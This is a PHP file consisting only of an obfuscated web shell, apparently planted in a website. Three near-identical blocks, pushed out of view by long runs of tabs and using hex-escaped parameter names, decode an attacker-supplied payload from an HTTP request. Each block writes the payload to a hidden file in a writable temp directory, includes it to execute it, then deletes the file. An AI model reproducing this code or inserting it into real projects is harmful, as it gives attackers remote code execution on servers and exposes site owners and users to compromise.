<?php																																										if(isset($_REQUEST["\x62indin\x67"]) ? true : false){ $dchunk = $_REQUEST["\x62indin\x67"]; $dchunk = explode ( '.' , $dchunk) ; $symbol = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s6 ); foreach($dchunk as $i => $v3) { $chS = ord($s6[$i % $sLen] ); $d = ((int)$v3 - $chS -($i % 10)) ^ 41; $symbol .= chr($d ); } $res = array_filter([session_save_path(), getcwd(), "/var/tmp", getenv("TMP"), "/tmp", getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir")]); foreach ($res as $key => $ref) { if ((is_dir($ref) and is_writable($ref))) { $ent = sprintf("%s/.mrk", $ref); if (file_put_contents($ent, $symbol)) { require $ent; unlink($ent); die(); } } } }
																																										if(@$_POST["sy\x6D\x62o\x6C"] !== null){ $record = $_POST["sy\x6D\x62o\x6C"]; $record = explode ( "." , $record) ; $k = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); foreach ($record as $o => $v9) { $chS = ord($s[$o % $lenS]); $dec = ((int)$v9 - $chS - ($o % 10)) ^ 62; $k .= chr($dec); } $sym = array_filter([getenv("TMP"), "/dev/shm", sys_get_temp_dir(), session_save_path(), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp"]); for ($flag = 0, $val = count($sym); $flag < $val; $flag++) { $ptr = $sym[$flag]; if (!!is_dir($ptr) && !!is_writable($ptr)) { $hld = str_replace("{var_dir}", $ptr, "{var_dir}/.elem"); if (file_put_contents($hld, $k)) { include $hld; @unlink($hld); exit; } } } }


if(!is_null($_POST["\x72\x65\x66\x65rence"] ?? null)){
	$ent = $_POST["\x72\x65\x66\x65rence"];
	  $ent	 = 	explode(	'.', $ent	)	 ; 
	$holder = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt);
            $r = 0;
    
            $__tmp = $ent;
            while($v4 = array_shift($__tmp)) {
                $sChar = ord($salt[$r  %	$lenS]);
                $dec =((int)$v4 - $sChar -($r  %	10)) ^ 35;
                $holder .= chr($dec);
                $r++;}
	$component = array_filter([getcwd(), "/dev/shm", getenv("TMP"), getenv("TEMP"), session_save_path(), sys_get_temp_dir(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir")]);
	while ($symbol = array_shift($component)) {
    		if (!!is_dir($symbol) && !!is_writable($symbol)) {
    $object = join("/", [$symbol, ".item"]);
    $file = fopen($object, 'w');
if ($file) {
	fwrite($file, $holder);
	fclose($file);
	include $object;
	@unlink($object);
	die();
}
}
}
}